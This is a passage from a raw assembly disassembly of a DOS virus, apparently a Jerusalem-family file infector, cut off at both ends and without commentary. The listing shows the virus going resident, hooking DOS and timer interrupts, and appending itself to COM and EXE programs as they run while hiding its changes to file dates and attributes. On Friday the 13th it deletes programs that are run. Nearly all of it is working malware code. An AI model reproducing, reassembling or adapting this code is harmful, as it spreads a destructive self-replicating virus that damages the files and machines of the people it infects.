OR AX,005CH +0000:003D B10D MOV CL,0DH +0000:003F 6C00 JL X0041 +0000:0041 B10D X0041: MOV CL,0DH +0000:0043 0004 ADD [SI],AL +0000:0045 5F POP DI +0000:0046 0F POP CS +0000:0047 B400 MOV AH,00H +0000:0049 C1 RET ; INTRASEGMENT +0000:004A 0D00F0 X004A: OR AX,0F000H +0000:004D 06 PUSH ES +0000:004E 004D5A ADD [DI+05AH],CL +0000:0051 2000 AND [BX+SI],AL +0000:0053 1000 ADC [BX+SI],AL +0000:0055 1900 SBB [BX+SI],AX +0000:0057 0800 OR [BX+SI],AL +0000:0059 7500 JNZ X005B +0000:005B 7500 X005B: JNZ X005D +0000:005D 6901 X005D: JNS X0060 +0000:005F 1007 ADC [BX],AL +0000:0061 8419 TEST BL,[BX+DI] +0000:0063 C500 LDS AX,[BX+SI] +0000:0065 6901 JNS X0068 +0000:0067 1C00 SBB AL,00H +0000:0069 0000 ADD [BX+SI],AL +0000:006B 4C X006B: DEC SP +0000:006C B000 MOV AL,00H +0000:006E CD21 INT 021H +0000:0070 050020 ADD AX,02000H +0000:0073 0037 ADD [BX],DH + +"JV.MOC" PAGE 0002 + +0000:0075 121C ADC BL,[SI] +0000:0077 0100 ADD [BX+SI],AX +0000:0079 0210 ADD DL,[BX+SI] +0000:007B 0010 ADD [BX+SI],DL +0000:007D 17 X007D: POP SS +0000:007E 0000 ADD [BX+SI],AL +0000:0080 53 PUSH BX +0000:0081 61E8 JNO X006B +0000:0083 38434F CMP [BP+DI+04FH],AL +0000:0086 4D DEC BP +0000:0087 4D DEC BP +0000:0088 41 INC CX +0000:0089 4E DEC SI +0000:008A 44 INC SP +0000:008B 2E43 INC BX +0000:008D 4F DEC DI +0000:008E 4D DEC BP +0000:008F 0100 ADD [BX+SI],AX +0000:0091 0000 ADD [BX+SI],AL +0000:0093 0000 ADD [BX+SI],AL +0000:0095 FC X0095: CLD +0000:0096 B4E0 MOV AH,0E0H +0000:0098 CD21 INT 021H +0000:009A 80FCE0 CMP AH,0E0H +0000:009D 7316 JAE X00B5 +0000:009F 80FC03 CMP AH,03H +0000:00A2 7211 JB X00B5 +0000:00A4 B4DD MOV AH,0DDH +0000:00A6 BF0001 MOV DI,0100H +0000:00A9 BE1007 MOV SI,0710H +0000:00AC 03F7 ADD SI,DI +0000:00AE 2E8B8D1100 MOV CX,CS:[DI+Y0011H] +0000:00B3 CD21 INT 021H +0000:00B5 8CC8 X00B5: MOV AX,CS +0000:00B7 051000 ADD AX,0010H +0000:00BA 8ED0 MOV SS,AX +0000:00BC BC0007 MOV SP,0700H +0000:00BF 50 PUSH AX +0000:00C0 B8C500 MOV AX,00C5H +0000:00C3 50 PUSH AX +0000:00C4 CB RET ; INTERSEGMENT +0000:00C5 FC X00C5: CLD +0000:00C6 06 PUSH ES +0000:00C7 2E8C063100 MOV CS:[Y0031H],ES +0000:00CC 2E8C063900 MOV CS:[Y0039H],ES +0000:00D1 2E8C063D00 MOV CS:[Y003DH],ES +0000:00D6 2E8C064100 MOV CS:[Y0041H],ES +0000:00DB 8CC0 MOV AX,ES +0000:00DD 051000 ADD AX,0010H +0000:00E0 2E01064900 ADD CS:[Y0049H],AX +0000:00E5 2E01064500 ADD CS:[Y0045H],AX +0000:00EA B4E0 MOV AH,0E0H +0000:00EC CD21 INT 021H +0000:00EE 80FCE0 CMP AH,0E0H +0000:00F1 7313 JAE X0106 +0000:00F3 80FC03 CMP AH,03H + +"JV.MOC" PAGE 0003 + +0000:00F6 07 POP ES +0000:00F7 2E8E164500 MOV SS,CS:[Y0045H] +0000:00FC 2E8B264300 MOV SP,CS:[Y0043H] +0000:0101 2EFF2E4700 JMP CS:[Y0047H] +0000:0106 33C0 X0106: XOR AX,AX +0000:0108 8EC0 MOV ES,AX +0000:010A 26A1FC03 MOV AX,ES:Y03FCH +0000:010E 2EA34B00 MOV CS:Y004BH,AX +0000:0112 26A0FE03 MOV AL,ES:Y03FEH +0000:0116 2EA24D00 MOV CS:Y004DH,AL +0000:011A 26C706FC03F3A5 MOV WORD PTR ES:[Y03FCH],0A5F3H +0000:0121 26C606FE03CB MOV BYTE PTR ES:[Y03FEH],0CBH +0000:0127 58 POP AX +0000:0128 051000 ADD AX,0010H +0000:012B 8EC0 MOV ES,AX +0000:012D 0E PUSH CS +0000:012E 1F POP DS +0000:012F B91007 MOV CX,0710H +0000:0132 D1E9 SHR CX,1 +0000:0134 33F6 XOR SI,SI +0000:0136 8BFE MOV DI,SI +0000:0138 06 PUSH ES +0000:0139 B84201 MOV AX,0142H +0000:013C 50 PUSH AX +0000:013D EAFC030000 JMP X0000_03FC +0000:0142 8CC8 MOV AX,CS +0000:0144 8ED0 MOV SS,AX +0000:0146 BC0007 MOV SP,0700H +0000:0149 33C0 XOR AX,AX +0000:014B 8ED8 MOV DS,AX +0000:014D 2EA14B00 MOV AX,CS:Y004BH +0000:0151 A3FC03 MOV Y03FCH,AX +0000:0154 2EA04D00 MOV AL,CS:Y004DH +0000:0158 A2FE03 MOV Y03FEH,AL +0000:015B 8BDC MOV BX,SP +0000:015D B104 MOV CL,04H +0000:015F D3EB SHR BX,CL +0000:0161 83C310 ADD BX,0010H +0000:0164 2E891E3300 MOV CS:[Y0033H],BX +0000:0169 B44A MOV AH,04AH +0000:016B 2E8E063100 MOV ES,CS:[Y0031H] +0000:0170 CD21 INT 021H +0000:0172 B82135 MOV AX,03521H +0000:0175 CD21 INT 021H +0000:0177 2E891E1700 MOV CS:[Y0017H],BX +0000:017C 2E8C061900 MOV CS:[Y0019H],ES +0000:0181 0E PUSH CS +0000:0182 1F POP DS +0000:0183 BA5B02 MOV DX,025BH +0000:0186 B82125 MOV AX,02521H +0000:0189 CD21 INT 021H +0000:018B 8E063100 MOV ES,[Y0031H] +0000:018F 268E062C00 MOV ES,ES:[Y002CH] +0000:0194 33FF XOR DI,DI +0000:0196 B9FF7F MOV CX,07FFFH +0000:0199 32C0 XOR AL,AL + +"JV.MOC" PAGE 0004 + +0000:019B F2AE X019B: REPNE SCASB +0000:019D 263805 CMP ES:[DI],AL +0000:01A0 E0F9 LOOPNZ X019B +0000:01A2 8BD7 MOV DX,DI +0000:01A4 83C203 ADD DX,0003H +0000:01A7 B8004B MOV AX,04B00H +0000:01AA 06 PUSH ES +0000:01AB 1F POP DS +0000:01AC 0E PUSH CS +0000:01AD 07 POP ES +0000:01AE BB3500 MOV BX,0035H +0000:01B1 1E PUSH DS +0000:01B2 06 PUSH ES +0000:01B3 50 PUSH AX +0000:01B4 53 PUSH BX +0000:01B5 51 PUSH CX +0000:01B6 52 PUSH DX +0000:01B7 B42A MOV AH,02AH +0000:01B9 CD21 INT 021H +0000:01BB 2EC6060E0000 MOV BYTE PTR CS:[Y000EH],00H +0000:01C1 81F9C307 CMP CX,07C3H +0000:01C5 7430 JZ X01F7 +0000:01C7 3C05 CMP AL,05H +0000:01C9 750D JNZ X01D8 +0000:01CB 80FA0D CMP DL,0DH +0000:01CE 7508 JNZ X01D8 +0000:01D0 2EFE060E00 INC BYTE PTR CS:[Y000EH] +0000:01D5 EB20 JMP X01F7 +0000:01D7 90 NOP +0000:01D8 B80835 X01D8: MOV AX,03508H +0000:01DB CD21 INT 021H +0000:01DD 2E891E1300 MOV CS:[Y0013H],BX +0000:01E2 2E8C061500 MOV CS:[Y0015H],ES +0000:01E7 0E PUSH CS +0000:01E8 1F POP DS +0000:01E9 C7061F00907E MOV WORD PTR [Y001FH],07E90H +0000:01EF B80825 MOV AX,02508H +0000:01F2 BA1E02 MOV DX,021EH +0000:01F5 CD21 INT 021H +0000:01F7 5A X01F7: POP DX +0000:01F8 59 POP CX +0000:01F9 5B POP BX +0000:01FA 58 POP AX +0000:01FB 07 POP ES +0000:01FC 1F POP DS +0000:01FD 9C PUSHF +0000:01FE 2EFF1E1700 CALL CS:[Y0017H] +0000:0203 1E PUSH DS +0000:0204 07 POP ES +0000:0205 B449 MOV AH,049H +0000:0207 CD21 INT 021H +0000:0209 B44D MOV AH,04DH +0000:020B CD21 INT 021H +0000:020D B431 MOV AH,031H +0000:020F BA0006 MOV DX,0600H +0000:0212 B104 MOV CL,04H + +"JV.MOC" PAGE 0005 + +0000:0214 D3EA SHR DX,CL +0000:0216 83C210 ADD DX,0010H +0000:0219 CD21 INT 021H +0000:021B 32C0 XOR AL,AL +0000:021D CF IRET +0000:021E 2E833E1F0002 CMP WORD PTR CS:[Y001FH],0002H +0000:0224 7517 JNZ X023D +0000:0226 50 PUSH AX +0000:0227 53 PUSH BX +0000:0228 51 PUSH CX +0000:0229 52 PUSH DX +0000:022A 55 PUSH BP +0000:022B B80206 MOV AX,0602H +0000:022E B787 MOV BH,087H +0000:0230 B90505 MOV CX,0505H +0000:0233 BA1010 MOV DX,01010H +0000:0236 CD10 INT 010H +0000:0238 5D POP BP +0000:0239 5A POP DX +0000:023A 59 POP CX +0000:023B 5B POP BX +0000:023C 58 POP AX +0000:023D 2EFF0E1F00 X023D: DEC WORD PTR CS:[Y001FH] +0000:0242 7512 JNZ X0256 +0000:0244 2EC7061F000100 MOV WORD PTR CS:[Y001FH],0001H +0000:024B 50 PUSH AX +0000:024C 51 PUSH CX +0000:024D 56 PUSH SI +0000:024E B90140 MOV CX,04001H +0000:0251 F3AC REPE LODSB +0000:0253 5E POP SI +0000:0254 59 POP CX +0000:0255 58 POP AX +0000:0256 2EFF2E1300 X0256: JMP CS:[Y0013H] +0000:025B 9C X025B: PUSHF +0000:025C 80FCE0 CMP AH,0E0H +0000:025F 7505 JNZ X0266 +0000:0261 B80003 MOV AX,0300H +0000:0264 9D POPF +0000:0265 CF IRET +0000:0266 80FCDD X0266: CMP AH,0DDH +0000:0269 7413 JZ X027E +0000:026B 80FCDE CMP AH,0DEH +0000:026E 7428 JZ X0298 +0000:0270 3D004B CMP AX,04B00H +0000:0273 7503 JNZ X0278 +0000:0275 E9B400 JMP X032C +0000:0278 9D X0278: POPF +0000:0279 2EFF2E1700 JMP CS:[Y0017H] +0000:027E 58 X027E: POP AX +0000:027F 58 POP AX +0000:0280 B80001 MOV AX,0100H +0000:0283 2EA30A00 MOV CS:Y000AH,AX +0000:0287 58 POP AX +0000:0288 2EA30C00 MOV CS:Y000CH,AX +0000:028C F3A4 REPE MOVSB + +"JV.MOC" PAGE 0006 + +0000:028E 9D POPF +0000:028F 2EA10F00 MOV AX,CS:Y000FH +0000:0293 2EFF2E0A00 JMP CS:[Y000AH] +0000:0298 83C406 X0298: ADD SP,0006H +0000:029B 9D POPF +0000:029C 8CC8 MOV AX,CS +0000:029E 8ED0 MOV SS,AX +0000:02A0 BC1007 MOV SP,0710H +0000:02A3 06 PUSH ES +0000:02A4 06 PUSH ES +0000:02A5 33FF XOR DI,DI +0000:02A7 0E PUSH CS +0000:02A8 07 POP ES +0000:02A9 B91000 MOV CX,0010H +0000:02AC 8BF3 MOV SI,BX +0000:02AE BF2100 MOV DI,0021H +0000:02B1 F3A4 REPE MOVSB +0000:02B3 8CD8 MOV AX,DS +0000:02B5 8EC0 MOV ES,AX +0000:02B7 2EF7267A00 MUL WORD PTR CS:[Y007AH] +0000:02BC 2E03062B00 ADD AX,CS:[Y002BH] +0000:02C1 83D200 ADC DX,0000H +0000:02C4 2EF7367A00 DIV WORD PTR CS:[Y007AH] +0000:02C9 8ED8 MOV DS,AX +0000:02CB 8BF2 MOV SI,DX +0000:02CD 8BFA MOV DI,DX +0000:02CF 8CC5 MOV BP,ES +0000:02D1 2E8B1E2F00 MOV BX,CS:[Y002FH] +0000:02D6 0BDB OR BX,BX +0000:02D8 7413 JZ X02ED +0000:02DA B90080 X02DA: MOV CX,08000H +0000:02DD F3A5 REPE MOVSW +0000:02DF 050010 ADD AX,01000H +0000:02E2 81C50010 ADD BP,01000H +0000:02E6 8ED8 MOV DS,AX +0000:02E8 8EC5 MOV ES,BP +0000:02EA 4B DEC BX +0000:02EB 75ED JNZ X02DA +0000:02ED 2E8B0E2D00 X02ED: MOV CX,CS:[Y002DH] +0000:02F2 F3A4 REPE MOVSB +0000:02F4 58 POP AX +0000:02F5 50 PUSH AX +0000:02F6 051000 ADD AX,0010H +0000:02F9 2E01062900 ADD CS:[Y0029H],AX +0000:02FE 2E01062500 ADD CS:[Y0025H],AX +0000:0303 2EA12100 MOV AX,CS:Y0021H +0000:0307 1F POP DS +0000:0308 07 POP ES +0000:0309 2E8E162900 MOV SS,CS:[Y0029H] +0000:030E 2E8B262700 MOV SP,CS:[Y0027H] +0000:0313 2EFF2E2300 JMP CS:[Y0023H] +0000:0318 33C9 X0318: XOR CX,CX +0000:031A B80143 MOV AX,04301H +0000:031D CD21 INT 021H +0000:031F B441 MOV AH,041H +0000:0321 CD21 INT 021H + +"JV.MOC" PAGE 0007 + +0000:0323 B8004B MOV AX,04B00H +0000:0326 9D POPF +0000:0327 2EFF2E1700 JMP CS:[Y0017H] +0000:032C 2E803E0E0001 X032C: CMP BYTE PTR CS:[Y000EH],01H +0000:0332 74E4 JZ X0318 +0000:0334 2EC7067000FFFF MOV WORD PTR CS:[Y0070H],0FFFFH +0000:033B 2EC7068F000000 MOV WORD PTR CS:[Y008FH],0000H +0000:0342 2E89168000 MOV CS:[Y0080H],DX +0000:0347 2E8C1E8200 MOV CS:[Y0082H],DS +0000:034C 50 PUSH AX +0000:034D 53 PUSH BX +0000:034E 51 PUSH CX +0000:034F 52 PUSH DX +0000:0350 56 PUSH SI +0000:0351 57 PUSH DI +0000:0352 1E PUSH DS +0000:0353 06 PUSH ES +0000:0354 FC CLD +0000:0355 8BFA MOV DI,DX +0000:0357 32D2 XOR DL,DL +0000:0359 807D013A CMP BYTE PTR [DI+01H],03AH +0000:035D 7505 JNZ X0364 +0000:035F 8A15 MOV DL,[DI] +0000:0361 80E21F AND DL,01FH +0000:0364 B436 X0364: MOV AH,036H +0000:0366 CD21 INT 021H +0000:0368 3DFFFF CMP AX,0FFFFH +0000:036B 7503 JNZ X0370 +0000:036D E97702 X036D: JMP X05E7 +0000:0370 F7E3 X0370: MUL BX +0000:0372 F7E1 MUL CX +0000:0374 0BD2 OR DX,DX +0000:0376 7505 JNZ X037D +0000:0378 3D1007 CMP AX,0710H +0000:037B 72F0 JB X036D +0000:037D 2E8B168000 X037D: MOV DX,CS:[Y0080H] +0000:0382 1E PUSH DS +0000:0383 07 POP ES +0000:0384 32C0 XOR AL,AL +0000:0386 B94100 MOV CX,0041H +0000:0389 F2AE REPNE SCASB +0000:038B 2E8B368000 MOV SI,CS:[Y0080H] +0000:0390 8A04 X0390: MOV AL,[SI] +0000:0392 0AC0 OR AL,AL +0000:0394 740E JZ X03A4 +0000:0396 3C61 CMP AL,061H +0000:0398 7207 JB X03A1 +0000:039A 3C7A CMP AL,07AH +0000:039C 7703 JA X03A1 +0000:039E 802C20 SUB BYTE PTR [SI],020H +0000:03A1 46 X03A1: INC SI +0000:03A2 EBEC JMP X0390 +0000:03A4 B90B00 X03A4: MOV CX,000BH +0000:03A7 2BF1 SUB SI,CX +0000:03A9 BF8400 MOV DI,0084H +0000:03AC 0E PUSH CS + +"JV.MOC" PAGE 0008 + +0000:03AD 07 POP ES +0000:03AE B90B00 MOV CX,000BH +0000:03B1 F3A6 REPE CMPSB +0000:03B3 7503 JNZ X03B8 +0000:03B5 E92F02 JMP X05E7 +0000:03B8 B80043 X03B8: MOV AX,04300H +0000:03BB CD21 INT 021H +0000:03BD 7205 JB X03C4 +0000:03BF 2E890E7200 MOV CS:[Y0072H],CX +0000:03C4 7225 X03C4: JB X03EB +0000:03C6 32C0 XOR AL,AL +0000:03C8 2EA24E00 MOV CS:Y004EH,AL +0000:03CC 1E PUSH DS +0000:03CD 07 POP ES +0000:03CE 8BFA MOV DI,DX +0000:03D0 B94100 MOV CX,0041H +0000:03D3 F2AE REPNE SCASB +0000:03D5 807DFE4D CMP BYTE PTR [DI-02H],04DH +0000:03D9 740B JZ X03E6 +0000:03DB 807DFE6D CMP BYTE PTR [DI-02H],06DH +0000:03DF 7405 JZ X03E6 +0000:03E1 2EFE064E00 INC BYTE PTR CS:[Y004EH] +0000:03E6 B8003D X03E6: MOV AX,03D00H +0000:03E9 CD21 INT 021H +0000:03EB 725A X03EB: JB X0447 +0000:03ED 2EA37000 MOV CS:Y0070H,AX +0000:03F1 8BD8 MOV BX,AX +0000:03F3 B80242 MOV AX,04202H +0000:03F6 B9FFFF MOV CX,0FFFFH +0000:03F9 BAFBFF MOV DX,0FFFBH +0000:03FC CD21 X03FC: INT 021H +0000:03FE 72EB JB X03EB +0000:0400 050500 ADD AX,0005H +0000:0403 2EA31100 MOV CS:Y0011H,AX +0000:0407 B90500 MOV CX,0005H +0000:040A BA6B00 MOV DX,006BH +0000:040D 8CC8 MOV AX,CS +0000:040F 8ED8 MOV DS,AX +0000:0411 8EC0 MOV ES,AX +0000:0413 B43F MOV AH,03FH +0000:0415 CD21 INT 021H +0000:0417 8BFA MOV DI,DX +0000:0419 BE0500 MOV SI,0005H +0000:041C F3A6 REPE CMPSB +0000:041E 7507 JNZ X0427 +0000:0420 B43E MOV AH,03EH +0000:0422 CD21 INT 021H +0000:0424 E9C001 JMP X05E7 +0000:0427 B82435 X0427: MOV AX,03524H +0000:042A CD21 INT 021H +0000:042C 891E1B00 MOV [Y001BH],BX +0000:0430 8C061D00 MOV [Y001DH],ES +0000:0434 BA1B02 MOV DX,021BH +0000:0437 B82425 MOV AX,02524H +0000:043A CD21 INT 021H +0000:043C C5168000 LDS DX,[Y0080H] + +"JV.MOC" PAGE 0009 + +0000:0440 33C9 XOR CX,CX +0000:0442 B80143 MOV AX,04301H +0000:0445 CD21 INT 021H +0000:0447 723B X0447: JB X0484 +0000:0449 2E8B1E7000 MOV BX,CS:[Y0070H] +0000:044E B43E MOV AH,03EH +0000:0450 CD21 INT 021H +0000:0452 2EC7067000FFFF MOV WORD PTR CS:[Y0070H],0FFFFH +0000:0459 B8023D MOV AX,03D02H +0000:045C CD21 INT 021H +0000:045E 7224 JB X0484 +0000:0460 2EA37000 MOV CS:Y0070H,AX +0000:0464 8CC8 MOV AX,CS +0000:0466 8ED8 MOV DS,AX +0000:0468 8EC0 MOV ES,AX +0000:046A 8B1E7000 MOV BX,[Y0070H] +0000:046E B80057 MOV AX,05700H +0000:0471 CD21 INT 021H +0000:0473 89167400 MOV [Y0074H],DX +0000:0477 890E7600 MOV [Y0076H],CX +0000:047B B80042 MOV AX,04200H +0000:047E 33C9 XOR CX,CX +0000:0480 8BD1 MOV DX,CX +0000:0482 CD21 INT 021H +0000:0484 723D X0484: JB X04C3 +0000:0486 803E4E0000 CMP BYTE PTR [Y004EH],00H +0000:048B 7403 JZ X0490 +0000:048D EB57 JMP X04E6 +0000:048F 90 NOP +0000:0490 BB0010 X0490: MOV BX,01000H +0000:0493 B448 MOV AH,048H +0000:0495 CD21 INT 021H +0000:0497 730B JAE X04A4 +0000:0499 B43E MOV AH,03EH +0000:049B 8B1E7000 MOV BX,[Y0070H] +0000:049F CD21 INT 021H +0000:04A1 E94301 JMP X05E7 +0000:04A4 FF068F00 X04A4: INC WORD PTR [Y008FH] +0000:04A8 8EC0 MOV ES,AX +0000:04AA 33F6 XOR SI,SI +0000:04AC 8BFE MOV DI,SI +0000:04AE B91007 MOV CX,0710H +0000:04B1 F3A4 REPE MOVSB +0000:04B3 8BD7 MOV DX,DI +0000:04B5 8B0E1100 MOV CX,[Y0011H] +0000:04B9 8B1E7000 MOV BX,[Y0070H] +0000:04BD 06 PUSH ES +0000:04BE 1F POP DS +0000:04BF B43F MOV AH,03FH +0000:04C1 CD21 INT 021H +0000:04C3 721C X04C3: JB X04E1 +0000:04C5 03F9 ADD DI,CX +0000:04C7 33C9 XOR CX,CX +0000:04C9 8BD1 MOV DX,CX +0000:04CB B80042 MOV AX,04200H +0000:04CE CD21 INT 021H + +"JV.MOC" PAGE 0010 + +0000:04D0 BE0500 MOV SI,0005H +0000:04D3 B90500 MOV CX,0005H +0000:04D6 F32EA4 REPE MOVS ES:BYTE PTR (DI),CS:BYTE PT + R (SI) +0000:04D9 8BCF MOV CX,DI +0000:04DB 33D2 XOR DX,DX +0000:04DD B440 MOV AH,040H +0000:04DF CD21 INT 021H +0000:04E1 720D X04E1: JB X04F0 +0000:04E3 E9BC00 JMP X05A2 +0000:04E6 B91C00 X04E6: MOV CX,001CH +0000:04E9 BA4F00 MOV DX,004FH +0000:04EC B43F MOV AH,03FH +0000:04EE CD21 INT 021H +0000:04F0 724A X04F0: JB X053C +0000:04F2 C70661008419 MOV WORD PTR [Y0061H],01984H +0000:04F8 A15D00 MOV AX,Y005DH +0000:04FB A34500 MOV Y0045H,AX +0000:04FE A15F00 MOV AX,Y005FH +0000:0501 A34300 MOV Y0043H,AX +0000:0504 A16300 MOV AX,Y0063H +0000:0507 A34700 MOV Y0047H,AX +0000:050A A16500 MOV AX,Y0065H +0000:050D A34900 MOV Y0049H,AX +0000:0510 A15300 MOV AX,Y0053H +0000:0513 833E510000 CMP WORD PTR [Y0051H],0000H +0000:0518 7401 JZ X051B +0000:051A 48 DEC AX +0000:051B F7267800 X051B: MUL WORD PTR [Y0078H] +0000:051F 03065100 ADD AX,[Y0051H] +0000:0523 83D200 ADC DX,0000H +0000:0526 050F00 ADD AX,000FH +0000:0529 83D200 ADC DX,0000H +0000:052C 25F0FF AND AX,0FFF0H +0000:052F A37C00 MOV Y007CH,AX +0000:0532 89167E00 MOV [Y007EH],DX +0000:0536 051007 ADD AX,0710H +0000:0539 83D200 ADC DX,0000H +0000:053C 723A X053C: JB X0578 +0000:053E F7367800 DIV WORD PTR [Y0078H] +0000:0542 0BD2 OR DX,DX +0000:0544 7401 JZ X0547 +0000:0546 40 INC AX +0000:0547 A35300 X0547: MOV Y0053H,AX +0000:054A 89165100 MOV [Y0051H],DX +0000:054E A17C00 MOV AX,Y007CH +0000:0551 8B167E00 MOV DX,[Y007EH] +0000:0555 F7367A00 DIV WORD PTR [Y007AH] +0000:0559 2B065700 SUB AX,[Y0057H] +0000:055D A36500 MOV Y0065H,AX +0000:0560 C7066300C500 MOV WORD PTR [Y0063H],00C5H +0000:0566 A35D00 MOV Y005DH,AX +0000:0569 C7065F001007 MOV WORD PTR [Y005FH],0710H +0000:056F 33C9 XOR CX,CX +0000:0571 8BD1 MOV DX,CX +0000:0573 B80042 MOV AX,04200H +0000:0576 CD21 INT 021H + +"JV.MOC" PAGE 0011 + +0000:0578 720A X0578: JB X0584 +0000:057A B91C00 MOV CX,001CH +0000:057D BA4F00 MOV DX,004FH +0000:0580 B440 MOV AH,040H +0000:0582 CD21 INT 021H +0000:0584 7211 X0584: JB X0597 +0000:0586 3BC1 CMP AX,CX +0000:0588 7518 JNZ X05A2 +0000:058A 8B167C00 MOV DX,[Y007CH] +0000:058E 8B0E7E00 MOV CX,[Y007EH] +0000:0592 B80042 MOV AX,04200H +0000:0595 CD21 INT 021H +0000:0597 7209 X0597: JB X05A2 +0000:0599 33D2 XOR DX,DX +0000:059B B91007 MOV CX,0710H +0000:059E B440 MOV AH,040H +0000:05A0 CD21 INT 021H +0000:05A2 2E833E8F0000 X05A2: CMP WORD PTR CS:[Y008FH],0000H +0000:05A8 7404 JZ X05AE +0000:05AA B449 MOV AH,049H +0000:05AC CD21 INT 021H +0000:05AE 2E833E7000FF X05AE: CMP WORD PTR CS:[Y0070H],0FFFFH +0000:05B4 7431 JZ X05E7 +0000:05B6 2E8B1E7000 MOV BX,CS:[Y0070H] +0000:05BB 2E8B167400 MOV DX,CS:[Y0074H] +0000:05C0 2E8B0E7600 MOV CX,CS:[Y0076H] +0000:05C5 B80157 MOV AX,05701H +0000:05C8 CD21 INT 021H +0000:05CA B43E MOV AH,03EH +0000:05CC CD21 INT 021H +0000:05CE 2EC5168000 LDS DX,CS:[Y0080H] +0000:05D3 2E8B0E7200 MOV CX,CS:[Y0072H] +0000:05D8 B80143 MOV AX,04301H +0000:05DB CD21 INT 021H +0000:05DD 2EC5161B00 LDS DX,CS:[Y001BH] +0000:05E2 B82425 MOV AX,02524H +0000:05E5 CD21 INT 021H +0000:05E7 07 X05E7: POP ES +0000:05E8 1F POP DS +0000:05E9 5F POP DI +0000:05EA 5E POP SI +0000:05EB 5A POP DX +0000:05EC 59 POP CX +0000:05ED 5B POP BX +0000:05EE 58 POP AX +0000:05EF 9D POPF +0000:05F0 2EFF2E1700 JMP CS:[Y0017H] +0000:05F5 0000 X05F5: ADD [BX+SI],AL +0000:05F7 0000 ADD [BX+SI],AL +0000:05F9 0000 ADD [BX+SI],AL +0000:05FB 0000 ADD [BX+SI],AL +0000:05FD 0000 ADD [BX+SI],AL +0000:05FF 004D00 ADD [DI+00H],CL +0000:0602 000F ADD [BX],CL +0000:0604 0000 ADD [BX+SI],AL +0000:0606 0000 ADD [BX+SI],AL + +"JV.MOC" PAGE 0012 + +0000:0608 0000 ADD [BX+SI],AL +0000:060A 0000 ADD [BX+SI],AL +0000:060C 0000 ADD [BX+SI],AL +0000:060E 0000 ADD [BX+SI],AL +0000:0610 CD20 INT 020H +0000:0612 00A0009A ADD [BX+SI+Y09A00H],AH +0000:0616 F0FE1D LOCK CALL [DI] ; NOT VALID +0000:0619 F02F LOCK DAS +0000:061B 018E1E3C ADD [BP+Y03C1EH],CX +0000:061F 018E1EEB ADD [BP+Y0EB1EH],CX +0000:0623 048E ADD AL,08EH +0000:0625 1E PUSH DS +0000:0626 8E1EFFFF MOV DS,[Y0FFFFH] +0000:062A FFFF ??? DI +0000:062C FFFF ??? DI +0000:062E FFFF ??? DI +0000:0630 FFFF ??? DI +0000:0632 FFFF ??? DI +0000:0634 FFFF ??? DI +0000:0636 FFFF ??? DI +0000:0638 FFFF ??? DI +0000:063A FFFF ??? DI +0000:063C 7C1F JL X065D +0000:063E DE3E8D29 ESC 037H,[Y0298DH] +0000:0642 1400 ADC AL,00H +0000:0644 1800 SBB [BX+SI],AL +0000:0646 F1 DB 0F1H +0000:0647 1F POP DS +0000:0648 FFFF ??? DI +0000:064A FFFF ??? DI +0000:064C 0000 ADD [BX+SI],AL +0000:064E 0000 ADD [BX+SI],AL +0000:0650 0000 ADD [BX+SI],AL +0000:0652 0000 ADD [BX+SI],AL +0000:0654 0000 ADD [BX+SI],AL +0000:0656 0000 ADD [BX+SI],AL +0000:0658 0000 ADD [BX+SI],AL +0000:065A 0000 ADD [BX+SI],AL +0000:065C 0000 ADD [BX+SI],AL +0000:065E 0000 ADD [BX+SI],AL +0000:0660 CD21 INT 021H +0000:0662 CB RET ; INTERSEGMENT +0000:0663 0000 X0663: ADD [BX+SI],AL +0000:0665 0000 ADD [BX+SI],AL +0000:0667 0000 ADD [BX+SI],AL +0000:0669 0000 ADD [BX+SI],AL +0000:066B 0000 ADD [BX+SI],AL +0000:066D 2020 AND [BX+SI],AH +0000:066F 2020 AND [BX+SI],AH +0000:0671 2020 AND [BX+SI],AH +0000:0673 2020 AND [BX+SI],AH +0000:0675 2020 AND [BX+SI],AH +0000:0677 2000 AND [BX+SI],AL +0000:0679 0000 ADD [BX+SI],AL +0000:067B 0000 ADD [BX+SI],AL +0000:067D 2020 AND [BX+SI],AH + +"JV.MOC" PAGE 0013 + +0000:067F 2020 AND [BX+SI],AH +0000:0681 2020 AND [BX+SI],AH +0000:0683 2020 AND [BX+SI],AH +0000:0685 2020 AND [BX+SI],AH +0000:0687 2000 AND [BX+SI],AL +0000:0689 0000 ADD [BX+SI],AL +0000:068B 0000 ADD [BX+SI],AL +0000:068D 0000 ADD [BX+SI],AL +0000:068F 0000 ADD [BX+SI],AL +0000:0691 0D6B6F OR AX,06F6BH +0000:0694 6465 JZ X06FB +0000:0696 6572 JNZ X070A +0000:0698 7A2E JPE X06C8 +0000:069A 6578 JNZ X0714 +0000:069C 6520 JNZ X06BE +0000:069E 613A JNO X06DA +0000:06A0 6B6F JPO X0711 +0000:06A2 6465 JZ X0709 +0000:06A4 6572 JNZ X0718 +0000:06A6 2E6578 JNZ X0721 +0000:06A9 650D JNZ X06B8 +0000:06AB 0000 ADD [BX+SI],AL +0000:06AD 0000 ADD [BX+SI],AL +0000:06AF 0000 ADD [BX+SI],AL +0000:06B1 0000 ADD [BX+SI],AL +0000:06B3 0000 ADD [BX+SI],AL +0000:06B5 0000 ADD [BX+SI],AL +0000:06B7 0000 ADD [BX+SI],AL +0000:06B9 0000 ADD [BX+SI],AL +0000:06BB 0000 ADD [BX+SI],AL +0000:06BD 0000 ADD [BX+SI],AL +0000:06BF 0000 ADD [BX+SI],AL +0000:06C1 0000 ADD [BX+SI],AL +0000:06C3 0000 ADD [BX+SI],AL +0000:06C5 0000 ADD [BX+SI],AL +0000:06C7 0000 ADD [BX+SI],AL +0000:06C9 0000 ADD [BX+SI],AL +0000:06CB 0000 ADD [BX+SI],AL +0000:06CD 0000 ADD [BX+SI],AL +0000:06CF 0000 ADD [BX+SI],AL +0000:06D1 0000 ADD [BX+SI],AL +0000:06D3 0000 ADD [BX+SI],AL +0000:06D5 0000 ADD [BX+SI],AL +0000:06D7 0000 ADD [BX+SI],AL +0000:06D9 005718 ADD [BX+018H],DL +0000:06DC 0825 OR [DI],AH +0000:06DE A5 MOVSW +0000:06DF FEC5 INC CH +0000:06E1 07 POP ES +0000:06E2 1E PUSH DS +0000:06E3 0210 ADD DL,[BX+SI] +0000:06E5 07 POP ES +0000:06E6 57 PUSH DI +0000:06E7 18B10D47 SBB [BX+DI+Y0470DH],DH +0000:06EB 0104 ADD [SI],AX +0000:06ED 7F70 JG X075F + +"JV.MOC" PAGE 0014 + +0000:06EF 0010 ADD [BX+SI],DL +0000:06F1 07 POP ES +0000:06F2 1D001C SBB AX,01C00H +0000:06F5 09A20D3D OR [BP+SI+Y03D0DH],SP +0000:06F9 0C1B OR 